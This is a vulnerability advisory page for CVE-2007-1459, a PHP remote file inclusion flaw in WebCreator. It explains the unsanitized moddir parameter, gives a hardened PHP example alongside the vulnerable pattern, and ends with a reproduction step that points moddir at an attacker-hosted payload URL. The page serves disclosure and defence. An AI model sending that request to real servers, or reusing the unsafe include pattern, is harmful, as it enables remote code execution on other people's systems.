VYPR
Unrated severity · NVD Advisory · Published Mar 14, 2007 · Updated Apr 23, 2026

CVE-2007-1459

Description

Multiple PHP remote file inclusion vulnerabilities in WebCreator 0.2.6-rc3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the moddir parameter to (1) content/load.inc.php, (2) config/load.inc.php, (3) http/load.inc.php, and unspecified other files.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

  • cpe:2.3:a:webcreator:webcreator:0.2.5:*:*:*:*:*:*:*
  • cpe:2.3:a:webcreator:webcreator:0.2.6_rc3:*:*:*:*:*:*:*
  • (no CPE) range: <=0.2.6-rc3

Patches

Vulnerability mechanics

Root cause

"Missing input validation on the $moddir parameter allows remote file inclusion via include_once."

Attack vector

An attacker can supply a URL in the `moddir` query parameter to any of the affected `load.inc.php` files. Because the `$moddir` variable is not validated before being passed to `include_once`, the server will include and execute arbitrary remote PHP code. The attack requires only that the target server has `register_globals` enabled (or that the variable is otherwise injectable) and that the `allow_url_include` PHP setting is active [ref_id=1].

Affected code

The vulnerability resides in `mods/content/load.inc.php`, `config/load.inc.php`, and `http/load.inc.php`. Each file contains an `include_once($moddir . '/functions.lib.php')` call that uses the unsanitized `$moddir` parameter [ref_id=1].

What the fix does

No patch is provided in the bundle. The advisory recommends sanitizing the `$moddir` variable in all affected files and disabling `register_globals` as a hardening measure [ref_id=1]. A proper fix would validate that `$moddir` is a local path within an allowed directory, or remove the user-controllable parameter entirely.
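To make the root cause and the recommended fix concrete, the following is an added PHP example; it is not WebCreator's own code. The first function reproduces the include pattern the advisory describes. The second shows one way to apply the recommended fix: treat `moddir` as a module name rather than a path, check it against an explicit allowlist, and confirm the resolved directory stays under a fixed base directory before calling `include_once`. The constant `MODS_BASE`, the `$allowedModules` list and the function names are assumptions for this illustration.

```php
<?php
// Added example, not WebCreator's own code. MODS_BASE and $allowedModules
// are assumed values for illustration.

// --- Pattern described in the advisory ---
// With register_globals on, ?moddir=... populates $moddir directly; with
// allow_url_include on, include_once will fetch and execute a remote file.
function load_functions_unsafe(string $moddir): void
{
    include_once($moddir . '/functions.lib.php');
}

// --- Hardened pattern ---
define('MODS_BASE', __DIR__ . '/mods');          // assumed install layout
$allowedModules = ['content', 'config', 'http'];  // assumed module names

/**
 * Map a requested module name to a local directory, or return null.
 * Three independent checks: shape of the value, allowlist membership,
 * and containment of the resolved path inside MODS_BASE.
 */
function resolve_module_dir(string $moddir, array $allowed): ?string
{
    // 1. Only a plain identifier is acceptable. This rejects URLs
    //    (scheme and slashes) and traversal sequences (dots, slashes).
    if (!preg_match('/\A[a-z0-9_]+\z/', $moddir)) {
        return null;
    }

    // 2. The name must be one the application actually ships.
    if (!in_array($moddir, $allowed, true)) {
        return null;
    }

    // 3. Resolve symlinks and confirm the directory is under MODS_BASE.
    $base = realpath(MODS_BASE);
    $path = realpath(MODS_BASE . '/' . $moddir);
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Include the module's function library only for a validated directory.
 * Returns false (and a 400 status) when the request is rejected.
 */
function load_functions_safe(string $moddir, array $allowed): bool
{
    $dir = resolve_module_dir($moddir, $allowed);
    if ($dir === null) {
        http_response_code(400);
        return false;
    }
    include_once($dir . '/functions.lib.php');
    return true;
}

// Read the parameter explicitly instead of relying on register_globals,
// so the script behaves the same regardless of that php.ini setting.
$requested = $_GET['moddir'] ?? '';
load_functions_safe($requested, $allowedModules);
```

The allowlist is the check that matters most: once `moddir` can only be one of a handful of known names, neither `register_globals` nor `allow_url_include` changes what `include_once` can reach. The `realpath` containment test is a second layer that holds even if the allowlist is later extended carelessly. Setting `register_globals = Off` and `allow_url_include = Off` in `php.ini`, as the advisory recommends, removes the two preconditions at the platform level and should be done in addition to the code change, not instead of it.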

Preconditions

  • config: PHP register_globals must be enabled (or the variable must otherwise be injectable)
  • config: PHP allow_url_include must be enabled for remote file inclusion
  • network: Attacker must be able to send HTTP requests to the vulnerable load.inc.php files
  • input: The moddir parameter is passed unsanitized into include_once

Reproduction

1. Host a PHP payload (e.g., `inject.txt`) on an attacker-controlled web server.
2. Send a request to the vulnerable script: `http://target/mods/config/load.inc.php?moddir=http://attacker.com/inject.txt?`
3. The server will include and execute the remote payload [ref_id=1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

